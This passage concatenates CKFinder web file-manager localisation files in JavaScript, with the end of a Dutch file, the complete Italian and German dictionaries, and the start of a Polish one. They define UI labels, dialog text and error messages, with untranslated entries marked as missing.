thumbnailSmall : 'Klein (%s)', thumbnailMedium : 'Medium (%s)', thumbnailLarge : 'Groot (%s)', newSize : 'Nieuwe afmetingen instellen', width : 'Breedte', height : 'Hoogte', invalidHeight : 'Ongeldige hoogte.', invalidWidth : 'Ongeldige breedte.', invalidName : 'Ongeldige bestandsnaam.', newImage : 'Nieuwe afbeelding maken', noExtensionChange : 'De bestandsextensie kan niet worden gewijzigd.', imageSmall : 'Bronafbeelding is te klein.', contextMenuName : 'Herschalen', lockRatio : 'Afmetingen vergrendelen', resetSize : 'Afmetingen resetten' }, // Fileeditor plugin Fileeditor : { save : 'Opslaan', fileOpenError : 'Kan het bestand niet openen.', fileSaveSuccess : 'Bestand is succesvol opgeslagen.', contextMenuName : 'Wijzigen', loadingFile : 'Bestand laden, even geduld a.u.b...' }, Maximize : { maximize : 'Maximaliseren', minimize : 'Minimaliseren' }, Gallery : { current : 'Afbeelding {current} van {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Italian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['it'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, non disponibile</span>', confirmCancel : 'Alcune delle opzioni sono state cambiate. Sei sicuro di voler chiudere la finestra di dialogo?', ok : 'OK', cancel : 'Annulla', confirmationTitle : 'Confermare', messageTitle : 'Informazione', inputTitle : 'Domanda', undo : 'Annulla', redo : 'Ripristina', skip : 'Ignora', skipAll : 'Ignora tutti', makeDecision : 'Che azione prendere?', rememberDecision: 'Ricorda mia decisione' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'it', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Cartelle', FolderLoading : 'Caricando...', FolderNew : 'Nome della cartella: ', FolderRename : 'Nuovo nome della cartella: ', FolderDelete : 'Se sicuro di voler eliminare la cartella "%1"?', FolderRenaming : ' (Rinominando...)', FolderDeleting : ' (Eliminando...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Nuovo nome del file: ', FileRenameExt : 'Sei sicure di voler cambiare la estensione del file? Il file può risultare inusabile.', FileRenaming : 'Rinominando...', FileDelete : 'Sei sicuro di voler eliminare il file "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Caricamento in corso...', FilesEmpty : 'Cartella vuota', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Cestino', BasketClear : 'Svuota Cestino', BasketRemove : 'Rimuove dal Cestino', BasketOpenFolder : 'Apre Cartella Superiore', BasketTruncateConfirm : 'Sei sicuro di voler svuotare il cestino?', BasketRemoveConfirm : 'Sei sicuro di voler rimuovere il file "%1" dal cestino?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Nessun file nel cestino, si deve prima trascinare qualcuno.', BasketCopyFilesHere : 'Copia i File dal Cestino', BasketMoveFilesHere : 'Muove i File dal Cestino', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Upload', UploadTip : 'Carica Nuovo File', Refresh : 'Aggiorna', Settings : 'Configurazioni', Help : 'Aiuto', HelpTip : 'Aiuto (Inglese)', // Context Menus Select : 'Seleziona', SelectThumbnail : 'Seleziona la miniatura', View : 'Vedi', Download : 'Scarica', NewSubFolder : 'Nuova Sottocartella', Rename : 'Rinomina', Delete : 'Elimina', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Copia qui', MoveDragDrop : 'Muove qui', // Dialogs RenameDlgTitle : 'Rinomina', NewNameDlgTitle : 'Nuovo nome', FileExistsDlgTitle : 'Il file già esiste', SysErrorDlgTitle : 'Errore di Sistema', FileOverwrite : 'Sovrascrivere', FileAutorename : 'Rinomina automaticamente', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Anulla', CloseBtn : 'Chiudi', // Upload Panel UploadTitle : 'Carica Nuovo File', UploadSelectLbl : 'Seleziona il file', UploadProgressLbl : '(Caricamento in corso, attendere prego...)', UploadBtn : 'Carica File', UploadBtnCancel : 'Annulla', UploadNoFileMsg : 'Seleziona il file da caricare', UploadNoFolder : 'Seleziona il file prima di caricare.', UploadNoPerms : 'Non è permesso il caricamento di file.', UploadUnknError : 'Errore nel caricamento del file.', UploadExtIncorrect : 'In questa cartella non sono permessi file con questa estensione.', // Flash Uploads UploadLabel : 'File da Caricare', UploadTotalFiles : 'File:', UploadTotalSize : 'Dimensione:', UploadSend : 'Upload', UploadAddFiles : 'Aggiungi File', UploadClearFiles : 'Elimina File', UploadCancel : 'Annulla il Caricamento', UploadRemove : 'Rimuovi', UploadRemoveTip : 'Rimuove !f', UploadUploaded : '!n% caricato', UploadProcessing : 'Attendere...', // Settings Panel SetTitle : 'Configurazioni', SetView : 'Vedi:', SetViewThumb : 'Anteprima', SetViewList : 'Lista', SetDisplay : 'Informazioni:', SetDisplayName : 'Nome del File', SetDisplayDate : 'Data', SetDisplaySize : 'Dimensione', SetSort : 'Ordina:', SetSortName : 'per Nome', SetSortDate : 'per Data', SetSortSize : 'per Dimensione', SetSortExtension : 'per Estensione', // Status Bar FilesCountEmpty : '<Nessun file>', FilesCountOne : '1 file', FilesCountMany : '%1 file', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Impossibile completare la richiesta. (Errore %1)', Errors : { 10 : 'Commando non valido.', 11 : 'Il tipo di risorsa non è stato specificato nella richiesta.', 12 : 'Il tipo di risorsa richiesto non è valido.', 102 : 'Nome di file o cartella non valido.', 103 : 'Non è stato possibile completare la richiesta a causa di restrizioni di autorizazione.', 104 : 'Non è stato possibile completare la richiesta a causa di restrizioni nei permessi del file system.', 105 : 'L\'estensione del file non è valida.', 109 : 'Richiesta invalida.', 110 : 'Errore sconosciuto.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Un file o cartella con lo stesso nome è già esistente.', 116 : 'Cartella non trovata. Prego aggiornare e riprovare.', 117 : 'File non trovato. Prego aggirnare la lista dei file e riprovare.', 118 : 'Il percorso di origine e di destino sono uguali.', 201 : 'Un file con lo stesso nome è già disponibile. Il file caricato è stato rinominato in "%1".', 202 : 'File invalido.', 203 : 'File invalido. La dimensione del file eccede i limiti del sistema.', 204 : 'Il file caricato è corrotto.', 205 : 'Il folder temporario non è disponibile new server.', 206 : 'Upload annullato per motivi di sicurezza. Il file contiene dati in formatto HTML.', 207 : 'Il file caricato è stato rinominato a "%1".', 300 : 'Non è stato possibile muovere i file.', 301 : 'Non è stato possibile copiare i file.', 500 : 'Questo programma è disabilitato per motivi di sicurezza. Prego contattare l\'amministratore del sistema e verificare le configurazioni di CKFinder.', 501 : 'Il supporto alle anteprime non è attivo.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Il nome del file non può essere vuoto.', FileExists : 'File %s già esiste.', FolderEmpty : 'Il nome della cartella non può essere vuoto.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'I seguenti caratteri non possono essere usati per comporre il nome del file: \n\\ / : * ? " < > |', FolderInvChar : 'I seguenti caratteri non possono essere usati per comporre il nome della cartella: \n\\ / : * ? " < > |', PopupBlockView : 'Non è stato possile aprire il file in una nuova finestra. Prego configurare il browser e disabilitare i blocchi delle popup.', XmlError : 'Non è stato possibile caricare la risposta XML dal server.', XmlEmpty : 'Non è stato possibile caricare la risposta XML dal server. La risposta è vuota.', XmlRawResponse : 'Risposta originale inviata dal server: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Ridimensiona %s', sizeTooBig : 'Non si può usare valori di altezza e larghezza che siano maggiore che le dimensioni originali (%size).', resizeSuccess : 'Immagine ridimensionata.', thumbnailNew : 'Crea una nuova thumbnail', thumbnailSmall : 'Piccolo (%s)', thumbnailMedium : 'Medio (%s)', thumbnailLarge : 'Grande (%s)', newSize : 'Nuove dimensioni', width : 'Larghezza', height : 'Altezza', invalidHeight : 'Altezza non valida.', invalidWidth : 'Larghezza non valida.', invalidName : 'Nome del file non valido.', newImage : 'Crea nuova immagine', noExtensionChange : 'L\'estensione del file non può essere cambiata.', imageSmall : 'L\'immagine originale è molto piccola.', contextMenuName : 'Ridimensiona', lockRatio : 'Blocca rapporto', resetSize : 'Reimposta dimensione' }, // Fileeditor plugin Fileeditor : { save : 'Salva', fileOpenError : 'Non è stato possibile aprire il file.', fileSaveSuccess : 'File salvato.', contextMenuName : 'Modifica', loadingFile : 'Attendere prego. Caricamento del file in corso...' }, Maximize : { maximize : 'Massimizza', minimize : 'Minimizza' }, Gallery : { current : 'Immagine {current} di {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the German * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['de'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, nicht verfügbar</span>', confirmCancel : 'Einige Optionen wurden geändert. Wollen Sie den Dialog dennoch schließen?', ok : 'OK', cancel : 'Abbrechen', confirmationTitle : 'Bestätigung', messageTitle : 'Information', inputTitle : 'Frage', undo : 'Rückgängig', redo : 'Wiederherstellen', skip : 'Überspringen', skipAll : 'Alle überspringen', makeDecision : 'Bitte Auswahl treffen.', rememberDecision: 'Entscheidung merken' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'de', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'd.m.yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Verzeichnisse', FolderLoading : 'Laden...', FolderNew : 'Bitte geben Sie den neuen Verzeichnisnamen an: ', FolderRename : 'Bitte geben Sie den neuen Verzeichnisnamen an: ', FolderDelete : 'Wollen Sie wirklich den Ordner "%1" löschen?', FolderRenaming : ' (Umbenennen...)', FolderDeleting : ' (Löschen...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Bitte geben Sie den neuen Dateinamen an: ', FileRenameExt : 'Wollen Sie wirklich die Dateierweiterung ändern? Die Datei könnte unbrauchbar werden!', FileRenaming : 'Umbennenen...', FileDelete : 'Wollen Sie wirklich die Datei "%1" löschen?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Laden...', FilesEmpty : 'Verzeichnis ist leer.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Korb', BasketClear : 'Korb löschen', BasketRemove : 'Aus dem Korb entfernen', BasketOpenFolder : 'Übergeordneten Ordner öffnen', BasketTruncateConfirm : 'Wollen Sie wirklich alle Dateien aus dem Korb entfernen?', BasketRemoveConfirm : 'Wollen Sie wirklich die Datei "%1" aus dem Korb entfernen?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Keine Dateien im Korb, einfach welche reinziehen.', BasketCopyFilesHere : 'Dateien aus dem Korb kopieren', BasketMoveFilesHere : 'Dateien aus dem Korb verschieben', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Hochladen', UploadTip : 'Neue Datei hochladen', Refresh : 'Aktualisieren', Settings : 'Einstellungen', Help : 'Hilfe', HelpTip : 'Hilfe', // Context Menus Select : 'Auswählen', SelectThumbnail : 'Miniatur auswählen', View : 'Ansehen', Download : 'Herunterladen', NewSubFolder : 'Neues Unterverzeichnis', Rename : 'Umbenennen', Delete : 'Löschen', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Hierher kopieren', MoveDragDrop : 'Hierher verschieben', // Dialogs RenameDlgTitle : 'Umbenennen', NewNameDlgTitle : 'Neuer Name', FileExistsDlgTitle : 'Datei existiert bereits', SysErrorDlgTitle : 'Systemfehler', FileOverwrite : 'Überschreiben', FileAutorename : 'Automatisch umbenennen', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Abbrechen', CloseBtn : 'Schließen', // Upload Panel UploadTitle : 'Neue Datei hochladen', UploadSelectLbl : 'Bitte wählen Sie die Datei aus', UploadProgressLbl : '(Die Daten werden übertragen, bitte warten...)', UploadBtn : 'Ausgewählte Datei hochladen', UploadBtnCancel : 'Abbrechen', UploadNoFileMsg : 'Bitte wählen Sie eine Datei auf Ihrem Computer aus.', UploadNoFolder : 'Bitte ein Verzeichnis vor dem Hochladen wählen.', UploadNoPerms : 'Datei hochladen nicht erlaubt.', UploadUnknError : 'Fehler bei Dateitragung.', UploadExtIncorrect : 'Dateinamekürzel nicht in diesem Verzeichnis erlaubt.', // Flash Uploads UploadLabel : 'Dateien zum Hochladen', UploadTotalFiles : 'Gesamtanzahl Dateien:', UploadTotalSize : 'Gesamtgröße:', UploadSend : 'Hochladen', UploadAddFiles : 'Datei hinzufügen', UploadClearFiles : 'Dateiliste löschen', UploadCancel : 'Upload abbrechen', UploadRemove : 'Entfernen', UploadRemoveTip : 'Entfernen !f', UploadUploaded : 'Hochgeladen !n%', UploadProcessing : 'In Arbeit...', // Settings Panel SetTitle : 'Einstellungen', SetView : 'Ansicht:', SetViewThumb : 'Miniaturansicht', SetViewList : 'Liste', SetDisplay : 'Anzeige:', SetDisplayName : 'Dateiname', SetDisplayDate : 'Datum', SetDisplaySize : 'Dateigröße', SetSort : 'Sortierung:', SetSortName : 'nach Dateinamen', SetSortDate : 'nach Datum', SetSortSize : 'nach Größe', SetSortExtension : 'nach Dateiendung', // Status Bar FilesCountEmpty : '<Leeres Verzeichnis>', FilesCountOne : '1 Datei', FilesCountMany : '%1 Datei', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Ihre Anfrage konnte nicht bearbeitet werden. (Fehler %1)', Errors : { 10 : 'Unbekannter Befehl.', 11 : 'Der Ressourcentyp wurde nicht spezifiziert.', 12 : 'Der Ressourcentyp ist nicht gültig.', 102 : 'Ungültiger Datei oder Verzeichnisname.', 103 : 'Ihre Anfrage konnte wegen Authorisierungseinschränkungen nicht durchgeführt werden.', 104 : 'Ihre Anfrage konnte wegen Dateisystemeinschränkungen nicht durchgeführt werden.', 105 : 'Invalid file extension.', 109 : 'Unbekannte Anfrage.', 110 : 'Unbekannter Fehler.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Es existiert bereits eine Datei oder ein Ordner mit dem gleichen Namen.', 116 : 'Verzeichnis nicht gefunden. Bitte aktualisieren Sie die Anzeige und versuchen es noch einmal.', 117 : 'Datei nicht gefunden. Bitte aktualisieren Sie die Dateiliste und versuchen es noch einmal.', 118 : 'Quell- und Zielpfad sind gleich.', 201 : 'Es existiert bereits eine Datei unter gleichem Namen. Die hochgeladene Datei wurde unter "%1" gespeichert.', 202 : 'Ungültige Datei.', 203 : 'ungültige Datei. Die Dateigröße ist zu groß.', 204 : 'Die hochgeladene Datei ist korrupt.', 205 : 'Es existiert kein temp. Ordner für das Hochladen auf den Server.', 206 : 'Das Hochladen wurde aus Sicherheitsgründen abgebrochen. Die Datei enthält HTML-Daten.', 207 : 'Die hochgeladene Datei wurde unter "%1" gespeichert.', 300 : 'Verschieben der Dateien fehlgeschlagen.', 301 : 'Kopieren der Dateien fehlgeschlagen.', 500 : 'Der Dateibrowser wurde aus Sicherheitsgründen deaktiviert. Bitte benachrichtigen Sie Ihren Systemadministrator und prüfen Sie die Konfigurationsdatei.', 501 : 'Die Miniaturansicht wurde deaktivert.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Der Dateinamen darf nicht leer sein.', FileExists : 'Datei %s existiert bereits.', FolderEmpty : 'Der Verzeichnisname darf nicht leer sein.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Der Dateinamen darf nicht eines der folgenden Zeichen enthalten: \n\\ / : * ? " < > |', FolderInvChar : 'Der Verzeichnisname darf nicht eines der folgenden Zeichen enthalten: \n\\ / : * ? " < > |', PopupBlockView : 'Die Datei konnte nicht in einem neuen Fenster geöffnet werden. Bitte deaktivieren Sie in Ihrem Browser alle Popup-Blocker für diese Seite.', XmlError : 'Es war nicht möglich die XML-Antwort von dem Server herunterzuladen.', XmlEmpty : 'Es war nicht möglich die XML-Antwort von dem Server herunterzuladen. Der Server hat eine leere Nachricht zurückgeschickt.', XmlRawResponse : 'Raw-Antwort vom Server: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Größenänderung %s', sizeTooBig : 'Bildgröße kann nicht größer als das Originalbild werden (%size).', resizeSuccess : 'Bildgröße erfolgreich geändert.', thumbnailNew : 'Neues Vorschaubild erstellen', thumbnailSmall : 'Klein (%s)', thumbnailMedium : 'Mittel (%s)', thumbnailLarge : 'Groß (%s)', newSize : 'Eine neue Größe setzen', width : 'Breite', height : 'Höhe', invalidHeight : 'Ungültige Höhe.', invalidWidth : 'Ungültige Breite.', invalidName : 'Ungültiger Name.', newImage : 'Neues Bild erstellen', noExtensionChange : 'Dateierweiterung kann nicht geändert werden.', imageSmall : 'Bildgröße zu klein.', contextMenuName : 'Größenänderung', lockRatio : 'Größenverhältnis beibehalten', resetSize : 'Größe zurücksetzen' }, // Fileeditor plugin Fileeditor : { save : 'Speichern', fileOpenError : 'Datei kann nicht geöffnet werden.', fileSaveSuccess : 'Datei erfolgreich gespeichert.', contextMenuName : 'Bearbeitung', loadingFile : 'Datei wird geladen, einen Moment noch...' }, Maximize : { maximize : 'Maximieren', minimize : 'Minimieren' }, Gallery : { current : 'Bild {current} von {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Polish * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['pl'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, wyłączone</span>', confirmCancel : 'Pewne opcje zostały zmienione. Czy na pewno zamknąć okno dialogowe?', ok : 'OK', cancel : 'Anuluj', confirmationTitle : 'Potwierdzenie', messageTitle : 'Informacja', inputTitle : 'Pytanie', undo : 'Cofnij', redo : 'Ponów', skip : 'Pomiń', skipAll : 'Pomiń wszystkie', makeDecision : 'Wybierz jedną z opcji:', rememberDecision: 'Zapamiętaj mój wybór' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'pl', LangCode : 'pl', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'yyyy-mm-dd HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Foldery', FolderLoading : 'Ładowanie...', FolderNew : 'Podaj nazwę nowego folderu: ', FolderRename : 'Podaj nową nazwę folderu: ', FolderDelete : 'Czy na pewno chcesz usunąć folder "%1"?', FolderRenaming : ' (Zmieniam nazwę...)', FolderDeleting : ' (Kasowanie...)', DestinationFolder : 'Folder docelowy', // Files FileRename : 'Podaj nową nazwę pliku: ', FileRenameExt : 'Czy na pewno chcesz zmienić rozszerzenie pliku? Może to spowodować problemy z otwieraniem pliku przez innych użytkowników.', FileRenaming : 'Zmieniam nazwę...', FileDelete : 'Czy na pewno chcesz usunąć plik "%1"?', FilesDelete : 'Czy na pewno chcesz usunąć pliki (razem: %1)?', FilesLoading : 'Ładowanie...', FilesEmpty : 'Folder jest pusty', DestinationFile : 'Plik docelowy', SkippedFiles : 'Lista pominiętych plików:', // Basket BasketFolder : 'Koszyk', BasketClear : 'Wyczyść koszyk', BasketRemove : 'Usuń z koszyka', BasketOpenFolder : 'Otwórz folder z plikiem', BasketTruncateConfirm : 'Czy naprawdę chcesz usunąć wszystkie pliki z koszyka?', BasketRemoveConfirm : 'Czy naprawdę chcesz usunąć plik "%1" z koszyka?', BasketRemoveConfirmMultiple : 'Czy naprawdę chcesz usunąć pliki (razem: %1) z koszyka?', BasketEmpty : 'Brak plików w koszyku. Aby dodać plik, przeciągnij i upuść (drag\'n\'drop) dowolny plik do koszyka.', BasketCopyFilesHere : 'Skopiuj pliki z koszyka', BasketMoveFilesHere : 'Przenieś pliki z koszyka', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Wyślij', UploadTip : 'Wyślij plik', Refresh : 'Odśwież', Settings : 'Ustawienia', Help : 'Pomoc', HelpTip : 'Wskazówka', // Context Menus Select : 'Wybierz', SelectThumbnail : 'Wybierz miniaturkę', View : 'Zobacz', Download : 'Pobierz', NewSubFolder : 'Nowy podfolder', Rename : 'Zmień nazwę', Delete : 'Usuń', DeleteFiles : 'Usuń pliki', CopyDragDrop : 'Skopiuj tutaj', MoveDragDrop : 'Przenieś tutaj', // Dialogs RenameDlgTitle : 'Zmiana nazwy', NewNameDlgTitle : 'Nowa nazwa', FileExistsDlgTitle : 'Plik już istnieje', SysErrorDlgTitle : 'Błąd systemu', FileOverwrite : 'Nadpisz', FileAutorename : 'Zmień automatycznie nazwę', ManuallyRename : 'Zmień nazwę ręcznie', // Generic OkBtn : 'OK', CancelBtn : 'Anuluj', CloseBtn : 'Zamknij', // Upload Panel UploadTitle : 'Wyślij plik', UploadSelectLbl : 'Wybierz plik', UploadProgressLbl : '(Trwa wysyłanie pliku, proszę czekać...)', UploadBtn : 'Wyślij wybrany plik', UploadBtnCancel : 'Anuluj', UploadNoFileMsg : 'Wybierz plik ze swojego komputera.', UploadNoFolder : 'Wybierz folder przed wysłaniem pliku.', UploadNoPerms : 'Wysyłanie plików nie jest dozwolone.', UploadUnknError : 'Błąd podczas wysyłania pliku.', UploadExtIncorrect : 'Rozszerzenie pliku nie jest dozwolone w tym folderze.', // Flash Uploads UploadLabel : 'Pliki do wysłania', UploadTotalFiles : 'Ilość razem:', UploadTotalSize : 'Rozmiar razem:', UploadSend : 'Wyślij', UploadAddFiles : 'Dodaj pliki', UploadClearFiles : 'Wyczyść wszystko', UploadCancel : 'Anuluj wysyłanie', UploadRemove : 'Usuń', UploadRemoveTip : 'Usuń !f', UploadUploaded : 'Wysłano: !n%', UploadProcessing : 'Przetwarzanie...', // Settings Panel SetTitle : 'Ustawienia', SetView : 'Widok:', SetViewThumb : 'Miniaturki', SetViewList : 'Lista', SetDisplay : 'Wyświetlanie:', SetDisplayName : 'Nazwa pliku', SetDisplayDate : 'Data', SetDisplaySize : 'Rozmiar pliku', SetSort : 'Sortowanie:', SetSortName : 'wg nazwy pliku', SetSortDate : 'wg daty', SetSortSize : 'wg rozmiaru', SetSortExtension : 'wg rozszerzenia', // Status Bar FilesCountEmpty : '<Pusty folder>', FilesCountOne : '1 plik', FilesCountMany : 'Ilość plików: %1', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Wykonanie operacji zakończyło się niepowodzeniem. (Błąd %1)', Errors : { 10 : 'Nieprawidłowe polecenie (command).', 11 : 'Brak wymaganego parametru: typ danych (resource type).', 12 : 'Nieprawidłowy typ danych (resource type).', 102 : 'Nieprawidłowa nazwa pliku lub folderu.', 103 : 'Wykonanie operacji nie jest możliwe: brak uprawnień.', 104 : 'Wykonanie operacji nie powiodło się z powodu niewystarczających uprawnień do systemu plików.', 105 : 'Nieprawidłowe rozszerzenie.', 109 : 'Nieprawiłowe żądanie.', 110 : 'Niezidentyfikowany błąd.', 111 : 'Wykonanie operacji nie powiodło się z powodu zbyt dużego rozmiaru pliku wynikowego.', 115 : 'Plik lub folder o podanej nazwie już istnieje.', 116 : 'Nie znaleziono folderu. Odśwież panel i spróbuj ponownie.', 117 : 'Nie znaleziono pliku. Odśwież listę plików i spróbuj ponownie.', 118 : 'Ścieżki źródłowa i docelowa są jednakowe.', 201 : 'Plik o podanej nazwie już istnieje. Nazwa przesłanego pliku została zmieniona na "%1".', 202 : 'Nieprawidłowy plik.', 203 : 'Nieprawidłowy plik. Plik przekracza dozwolony rozmiar.', 204 : 'Przesłany plik jest uszkodzony.', 205 : 'Brak folderu tymczasowego na serwerze do przesyłania plików.', 206 : 'Przesyłanie pliku zakończyło się niepowodzeniem z powodów bezpieczeństwa. Plik zawiera dane przypominające HTML.', 207 : 'Nazwa przesłanego pliku została zmieniona na "%1".', 300 : 'Przenoszenie nie powiodło się.', 301 : 'Kopiowanie nie powiodo się.', 500 : 'Menedżer plików jest wyłączony z powodów bezpieczeństwa. Skontaktuj się z administratorem oraz sprawdź plik konfiguracyjny CKFindera.', 501 : 'Tworzenie miniaturek jest wyłączone.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Nazwa pliku nie może być pusta.', FileExists : 'Plik %s już istnieje.', FolderEmpty : 'Nazwa folderu nie może być pusta.', FolderExists : 'Folder %s już istnieje.', FolderNameExists : 'Folder już istnieje.', FileInvChar : 'Nazwa pliku nie może zawierać żadnego z podanych znaków: \n\\ / : * ? " < > |', FolderInvChar : 'Nazwa folderu nie może zawierać żadnego z podanych znaków: \n\\ / : * ? " < > |', PopupBlockView : 'Otwarcie pliku w nowym oknie nie powiodło się. Należy zmienić konfigurację przeglądarki i wyłączyć wszelkie blokady okienek popup dla tej strony.', XmlError : 'Nie można poprawnie załadować odpowiedzi XML z serwera WWW.', XmlEmpty : 'Nie można załadować odpowiedzi XML z serwera WWW. Serwer zwrócił pustą odpowiedź.', XmlRawResponse : 'Odpowiedź serwera: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Zmiana rozmiaru %s', sizeTooBig : 'Nie możesz zmienić wysokości lub szerokości na wartość większą od oryginalnego rozmiaru (%size).', resizeSuccess : 'Obrazek został pomyślnie przeskalowany.', thumbnailNew : 'Utwórz nową miniaturkę', 